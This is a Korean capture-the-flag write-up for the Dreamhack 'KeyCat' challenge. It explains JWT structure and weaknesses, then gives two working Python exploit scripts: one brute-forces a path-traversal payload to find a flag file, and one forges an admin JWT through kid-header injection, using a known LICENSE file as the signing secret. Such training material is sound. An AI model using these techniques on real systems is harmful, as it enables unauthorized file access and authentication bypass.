[Dreamhack] Level4: KeyCat

🛎️ Access

cat loves cats

 

 

👾 Exploit Algorithm & Payload

> deploy

> docker-compose.yml

... (*많은 폴더의 정보 유심히 볼 필요 있음)

 

 

#1

---

: docker-compose.yml 파일을 분석했다.

: Dockeer-compose는 여러개의 컨테이너로부터 이루어진 서비스를 구축, 실행하는 순서를 자동으로 하여 관리를 간단하게 하는 것으로, 여러개의 컨테이너 설정 내용을 하나의 yml 파일에 모아서 사용할 수 있다. 즉, compose 파일을 준비해서 커맨드 1번을 실행하는 것만으로 그 파일로부터 설정을 읽어들여 모든 컨테이너 서비스를 실행시킬 수 있도록 하였다.

: 꼭 문제에서 사용하지 않아도 된다. 단, 문제의 접속 포트가 일정 시간이 지나면 바뀌기 때문에 로컬상에서 확인 후 접속 포트에서 값을 확인했다.

 

* 해당 문제는 Json Web Token(JWT)와 관련된 지식을 알아야만 한다.

* 검색해보면 다양하게 정리가 잘 되어있다.

 

> JWT (이란?, 구조, 취약점)

- JWT이란?

: JWT는 암호화와 검증(Signature) 기능을 가진 인증 토큰이다

 

- JWT 구조

: Base64(Header).Base64(Payload).Base64(Signature)

 

* Header: {"alg": "HS256","typ": "JWT"}

: typ와 alg라는 정보가 존재하는데 typ의 값은 JWT이고 alg는 signature를 해싱하기위한 알고리즘이다.

 

* Payload: {"sub": "1234567890","name": "John Doe","iat": 1516239022}

서버에서 첨부한 사용자 권한 정보와 데이터가 담겨있다.

 

* Signature: HMACSHA256(base64UrlEncode(header)+"."+base64UrlEncode(payload), your-256-bit-secret)

Signature: Header, Payload 를 Base64 URL-safe Encode를 한 이후 Header 에 명시된 해시함수를 적용하고, 개인키(Private Key)로 서명한 전자서명이 담겨있다.

 

(

 JWT의 무결성을 보장하기 위해 여러 서명 알고리즘(alg)를 사용할 수 있음

→RSA base, Elliptice curves, HMAC, None

)

 

- JWT 취약점 (6가지, ...)

: Signature 미확인, None 알고리즘 사용, 비대칭 알고리즘으로 변경, JKW Injection, JKU Spoofing, kid injection)

 

--- Explotation ---

> refer to...

https://jwt.io/

JWT.IO

→ Step 01 토큰 확인: 토큰을 Base64 디코딩하여 확인

{"alg":"HS256","typ":"JWT"}.{"name":"John Doe","user_name":"john.doe", "perm":"user"}

→ Step 02 Payload 변조: Payload 부분을 변조

{"alg":"HS256","typ":"JWT"}.{"name":"John Doe","user_name":"john.doe", "perm":"admin"}

→ Step 03 토큰 사용: 변조된 Payload 부분을 Base64 인코딩하여 기존의 토큰에 대치시킴. Signature 검증이 미흡할 경우 토큰이 유효하게 됨

 

 

#2

---

: entrypoint.sh 파일을 분석했다.

: 파일의 플래그가 FLAG_CONTENT_1, FLAG_CONTENT_2로 있는 것을 알 수 있다.

: FLAG는 /home/cat/deploy/flag$FLAG.txt로 되어 있는 것을 확인할 수 있는데 이는 쉘에서 변수에 2글자의 랜덤한 a-f0-9 문자열을 할당하여 플래그 파일 이름에 붙는 것이다.

 

: ./routes/cat.js 파일을 분석했다.

: /cat/flag와 /cat/admin 엔드포인트의 조건에 맞춰서 요청을 보내면 각각 FLAG_CONTENT를 확인할 수 있다.

 

: /cat/flag는 req.filename에 FLAG_FILE_NAME의 내용이 포함되어 있어야 한다.

: 즉, 아까 확인했던 flag$FLAG.txt의 랜덤한 문자열이 붙은 플래그 파일 이름을 알아야만 한다.

 

: /cat/admin은 req.usernam이 'cat_master'이어야 함을 알 수 있다.

 

 

#3

---

: ./routes/index.js 파일을 분석했다.

: jwt.js파일에서 JWT를 발급하고 검사하는 메서드를 확인할 수 있다.

: 사용자로부터 fn 파라미터 값을 입력받아 sign()메서드의 인자 값으로 넘겨주어서 새로운 토큰을 생성할 수 있다.

 

: 현재 경로는 '/' 경로에서 ../와 같은 상위 디렉토리에 이동하여 파일 여부를 확인할 수 있었다.

 

: 이를 이용하여 JWT를 분석했다.

 

 

🔑Analysis and results for obtaining the Flag_1 DH{…}

---

import string, requests, sys

# abcdefghijklmnopqrstuvwxyz0123456789 (a-f0-9)
random_ch = string.ascii_lowercase + string.digits

for str1 in random_ch:
    for str2 in random_ch:
        payload = f"../../../../../../../home/cat/deploy/flag{str1}{str2}.txt"
        target_url = f"http://host3.dreamhack.games:9147/?fn={payload}"

        # GET 요청
        response = requests.get(target_url, params=payload)

        # Unauthorized...
        if 'File not found' in response.text:
            print(f"{payload} -> {response.text}")
        else:
            print(f"\n{target_url} -> {payload}")
            print(f"FLAG_1_TOKEN: {response.text}")
            sys.exit()

 

 

: Path Traversal 취약점을 이용하였다.

: filename은 어떠한 검증도 거치지 않았고, ../와 같은 문자 값이 제한되어 있지 않았다.

: 따라서 flag파일로 접근할 수 있다면 /cat/flag에서 해당 토큰을 얻을 수 있다.

 

 

🔑Analysis and results for obtaining the Flag_2 DH{…}

---

import jwt
import string
from requests import get
from re import search

SECRET_KEY = """The MIT License (MIT)
 
Copyright (c) 2015 Auth0, Inc. <support@auth0.com> (http://auth0.com)
 
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
 
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
 
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""

headers = {"kid": "../node_modules/jsonwebtoken/LICENSE"}
data = {
  "filename": "../node_modules/jsonwebtoken/LICENSE",
  "username": "cat_master",
  "iat": 1707707182
}
FLAG_2_TOKEN = jwt.encode(data, SECRET_KEY, headers=headers, algorithm="HS256")

target_url = "http://host3.dreamhack.games:8285"
res = get(f"{target_url}/cat/admin", cookies={"session": f"{FLAG_2_TOKEN}"})
m = search(r"[a-f0-9]{15,}.*?\}", res.text)

print(FLAG_2_TOKEN)

: ../jwt.js 파일을 분석했다.

: 시스템에 존재하는 파일의 내용을 읽어 JWT를 위한 비밀키를 생성할 수 있다. /dev/null과 같이 대부분의 시스템에 있는 파일을 읽어 사용자가 정한 임의의 비밀키를 생성할 수 있지만, fs.readFileSync() 메서드에서 utf-8 옵션에 의해서 존재는 하지만 비어있는 파일이라면 반환 값이 빈 문자열이다. 빈 문자열을 비밀키로 하면 'Error: secretOrPrivateKey must have a value' 에러가 발생하여 토큰을 생성할 수 없다.

: 때문에 서버에서 존재하는 파일과 같은 내용을 가진 어떤 변하지 않는 파일을 찾아야 한다.

: 많은 파일이 있지만, 여기서는 Node.js로 동작하고 있고 폴더를 확인하다 LICENSE라는 파일을 확인했기에 해당 위치에 파일을 확인했다. (Path Traversal 취약점, Authentication Bypass 취약점)

: 따라서 해당 Token을 얻고 JWT Token의 payload 부분에 username을 'cat_master'로 변경하면 /cat/admin에 해당하는 토큰을 얻을 수 있다.